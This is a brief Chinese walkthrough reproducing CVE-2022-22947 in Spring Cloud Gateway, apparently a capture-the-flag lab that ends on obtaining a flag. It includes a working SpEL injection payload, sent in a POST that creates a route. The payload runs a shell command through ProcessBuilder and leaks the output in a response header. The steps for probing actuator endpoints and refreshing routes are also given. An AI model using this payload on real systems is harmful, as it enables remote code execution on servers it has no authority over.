CVE-2022-22947-Spring Cloud Gateway 漏洞复现

1.抓取数据包，GET请求/actuator/,查看是否开启actuator功能，列出路由接口信息

2.POST请求创建新路由路由，需添加一个Content-Type:application/json头。和如下代码：

{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result=",
"value": "#{new java.util.Scanner(new java.lang.ProcessBuilder('ls', 'tmp').start().getInputStream(), 'GBK').useDelimiter('asfsfsdfsf').next()}"
}
}],
"uri": "http://test.com"
}

，

 

创建成功

 

 3.刷新路由器，手动添加一个参数，否则可能无法访问成功

 

 

 4.GET方法请求，访问路由信息。这里需要将Content-Length头删除，才能成功。得到flag